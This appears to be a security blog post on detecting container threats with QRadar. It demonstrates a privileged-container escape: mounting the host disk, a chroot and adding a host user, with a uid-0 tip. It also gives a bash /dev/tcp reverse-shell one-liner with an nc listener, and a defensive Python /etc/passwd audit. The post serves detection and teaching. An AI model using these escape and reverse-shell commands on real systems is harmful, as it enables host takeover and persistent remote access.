Containers are an operating system virtualisation technology used to package applications and their dependencies so that they can run anywhere: "write once, run anywhere."
With more and more production containers and services being deployed into cloud environments, the threat landscape has evolved. Security analysts need to be aware of the different threats targeting the container landscape, especially at runtime, and of how an adversary can break out of or escape the container to control the host operating system.
Container Runtime Security
One of the main techniques for detecting whether a container has been compromised is to monitor its behaviour at runtime. Scanning the container image is not enough; we also need to keep an eye on its behaviour during runtime.
Containers share the host kernel, which makes it much easier to monitor container behaviour: we can see every process execution, network connection, and file modification from all the containers at the host level, without installing an agent in the containers.
Using QRadar, we can baseline the container behaviour and notify security analysts when a container deviates from its intended behaviour, for example:
If a container starts executing unknown, unseen or unusual processes
If a container communicates with unusual IPs / network CIDRs / countries, …
Or if a container modifies critical files in the host operating system
Process Creation in a container
Escaping the Container
One of the main goals for adversaries is to escape the container and escalate their privileges to control the host operating system. There are several ways to achieve this; one of them applies if the compromised container is a privileged container.
Security analysts need to keep an eye on privileged containers, as they can access the host devices. If the compromised container is a privileged one, an adversary can mount the host hard disk and edit any file in the host operating system.
As an example, let us create the following privileged container and see how we can add a new user in the host operating system, then SSH to the host OS using the newly added user.
## to create a privileged container:
docker run --privileged -it ubuntu bash
Detecting the creation of a Privileged Container
As the privileged container can access the host devices, let us mount the host hard disk:
mkdir /mutaz
fdisk -l
mount /dev/sda1 /mutaz
Now let us add a new privileged user in the host OS. We can do it by directly modifying /etc/passwd in our mounted path, or by changing the process root directory to our mounted path:
chroot /mutaz /bin/bash
adduser mike
Container added a new user in the host OS
We just added a new user in the host operating system while inside the container. There are many different ways to make this user a privileged one, e.g. by adding the user to a privileged group; an easy way is to change the user's uid to zero, which can also be detected by looking for a non-root user with a uid of zero. Security analysts also need to watch for an unusual process modifying a critical file like /etc/passwd; sysadmins and DevOps will not directly modify such a file.
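The two checks described above (a newly added account, and a non-root account with a uid of zero), as an added example that is not part of the original post or of the QRadar content pack: it compares a known-good snapshot of the host's /etc/passwd with the current file. The function names and the sample passwd contents are assumptions constructed for illustration.

```python
# Added example; all sample data below is constructed.
BASELINE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
"""
# Constructed "after" state: a new account whose uid was edited to 0, plus a
# truncated line such as a careless direct edit might leave behind.
CURRENT = BASELINE + "mike:x:0:0:,,,:/home/mike:/bin/bash\nbroken:x:1001\n"


def parse_passwd(text):
    """Parse passwd(5) text into ([(name, uid), ...], [malformed lines])."""
    entries, malformed = [], []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        fields = line.split(":")
        # passwd(5): name:password:UID:GID:GECOS:home:shell
        uid = fields[2] if len(fields) == 7 else ""
        if not fields[0] or not (uid.isascii() and uid.isdigit()):
            malformed.append(line)  # report it, never skip silently
            continue
        entries.append((fields[0], int(uid)))
    return entries, malformed


def audit_passwd(baseline_text, current_text):
    """Compare a known-good snapshot of /etc/passwd with its current content."""
    known = dict(parse_passwd(baseline_text)[0])
    entries, malformed = parse_passwd(current_text)
    return {
        "new_accounts": sorted({n for n, _ in entries if n not in known}),
        "uid0_non_root": sorted({n for n, u in entries if u == 0 and n != "root"}),
        "uid_changed": sorted({n for n, u in entries if n in known and known[n] != u}),
        "malformed": malformed,
    }


if __name__ == "__main__":
    for finding, values in audit_passwd(BASELINE, CURRENT).items():
        print(f"{finding}: {values}")
```

Any non-empty finding is worth an alert on a host that runs containers, since the file should only change through the normal user-management tools.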
Reverse Shell for Persistence
One way to achieve persistence is to plant a reverse shell, which can be done in a single command line as follows:
bash -i >& /dev/tcp/192.168.0.171/4444 0>&1
The attacker will be waiting for an incoming connection on port 4444, as follows:
nc -lvp 4444
Detection of Reverse Shell
Security analysts can hunt all of the above malicious activities, and more, using the following out-of-the-box QRadar content pack:
https://exchange.xforce.ibmcloud.com/hub/extension/03b5e623d978dfa84b339dd6d38e02d5